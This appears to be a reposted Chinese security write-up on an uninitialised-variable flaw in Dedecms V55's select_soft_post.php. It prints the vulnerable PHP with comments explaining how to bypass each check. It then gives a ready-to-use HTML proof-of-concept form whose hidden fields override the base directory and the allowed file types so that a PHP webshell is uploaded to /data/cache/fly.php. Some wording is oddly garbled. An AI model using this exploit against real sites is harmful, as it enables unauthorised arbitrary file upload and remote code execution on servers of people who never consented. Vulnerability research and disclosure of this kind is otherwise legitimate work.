一个变量未初始化漏洞的深化操纵 Dedecms V55[网络技术]

近日Dedecms V55 公布了,姑且不管功效和可用性能否加强,安全性仍旧如前期版本一样不容乐观.本文就简单的解析一个由变量未初始化造成安全漏洞.
漏洞发生在include\dialog\select_soft_post.php文件,这个文件正常情形下是只有管理员登陆后才能拜候的,但是很不幸的是$cfg_basedir没有精确初始化,招致我们可以绕过身份认证和系统变量初始化文件,终究可以成功上传肆意文件到指定目录.看代码
---------------------------------------------------------------------------
<?php if(!isset($cfg_basedir)) //在php全局变量翻开的时刻我们可以帮忙系统初始化$cfg_basedir,从而绕过身份认证文件//config.php { include_once(dirname(__FILE__).'/config.php'); } if(empty($uploadfile)) $uploadfile = ''; if(empty($uploadmbtype)) $uploadmbtype = '软件范例'; if(empty($bkurl)) $bkurl = 'select_soft.php'; $newname = ( empty($newname) ? '' : ereg_replace("[\\ \"\*\?\t\r\n<>':/|]", "", $newname) ); //$uploadfile、$uploadmbtype、$newname我们都可以掌握 if(!is_uploaded_file($uploadfile)) { ShowMsg("你没有挑选上传的文件或挑选的文件大小超越限制!", "-1"); exit(); } $cfg_softtype = $cfg_softtype.'|'.$cfg_imgtype.'|'.$cfg_mediatype; $cfg_softtype = str_replace('||', '|', $cfg_softtype); //$cfg_softtype代表答应上传的文件范例,我们可以指定为php $uploadfile_name = trim(ereg_replace("[ \r\n\t\*\%\\/\?><\|\":]{1,}",'',$uploadfile_name)); if(!eregi("\.(".$cfg_softtype.")", $uploadfile_name)) {//这段要注意绕过,ShowMsg为未定义函数 ShowMsg("你所上传的{$uploadmbtype}不在答应列表,请更改系统对扩大名限定的配置!","-1"); exit(); } $nowtme = time(); if($activepath==$cfg_soft_dir) {//这段要注意绕过,不然将造成未定义函数错误,从而中止程序履行 $newdir = MyDate($cfg_addon_savetype, $nowtme); $activepath = $activepath.'/'.$newdir; if(!is_dir($cfg_basedir.$activepath)) { MkdirAll($cfg_basedir.$activepath,$cfg_dir_purview); CloseFtp(); } } //文件名（前为手工指定, 后者自动处理,要进入前者,避开未定义函数错误） if(!empty($newname)) { $filename = $newname; if(!ereg("\.", $filename)) $fs = explode('.', $uploadfile_name); else $fs = explode('.', $filename); if(eregi($cfg_not_allowall, $fs[count($fs)-1])) {//这段要注意绕过,ShowMsg为未定义函数 ShowMsg("你指定的文件名被系统禁止!",'javascript:;'); exit(); } if(!ereg("\.", $filename)) $filename = $filename.'.'.$fs[count($fs)-1]; } else {//不进入该历程 $filename = $cuserLogin->getUserID().'-'.dd2char(MyDate('ymdHis',$nowtme)); $fs = explode('.', $uploadfile_name); if(eregi($cfg_not_allowall, $fs[count($fs)-1])) { ShowMsg("你上传了某些大概存在不安全因素的文件,系统回绝操作!",'javascript:;'); exit(); } $filename = $filename.'.'.$fs[count($fs)-1]; } $fullfilename = $cfg_basedir.$activepath.'/'.$filename; $fullfileurl = $activepath.'/'.$filename; //在这里可以指定上传到的目录,成功将指定范例的文件上传到目录 move_uploaded_file($uploadfile,$fullfilename) or die("上传文件到 $fullfilename 失利!"); //背面的代码我们无需再关心,因为在文件已经成功上传 …… -------------------------------------------------------------------------

代码里面注释的很清楚了,操纵该漏洞需求register_globals = on,我们通过自定义一个表单为相关的变量赋值,终究便可成功到达上传可履行文件的目的.下面给出一个简单的操纵工具:

----------------------------------------------------------------------------

<HTML><HEAD><TITLE>Dedecms v55 Remote Arbitrary File Upload POC By Flyh4t</TITLE></HEAD> <BODY style="FONT-SIZE: 9pt">---------- Dedecms v55 RCE Exploit Codz By flyh4t ---------- <br><br> <form action=http://127.0.0.1/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'> <input type='hidden' name='activepath' value='/data/cache/' /> <input type='hidden' name='cfg_basedir' value='../../' /> <input type='hidden' name='cfg_imgtype' value='php' /> <input type='hidden' name='cfg_not_allowall' value='txt' /> <input type='hidden' name='cfg_softtype' value='php' /> <input type='hidden' name='cfg_mediatype' value='php' /> <input type='hidden' name='f' value='form1.enclosure' /> <input type='hidden' name='job' value='upload' /> <input type='hidden' name='newname' value='fly.php' /> Select U Shell <input type='file' name='uploadfile' size='25' /> <input type='submit' name='sb1' value='肯定' /> </form> <br> It's just a exp for the bug of Dedecms V55...<br> Need register_globals = on...<br> Fun the game,get a webshell at /data/cache/fly.php...<br> </BODY> </HTML>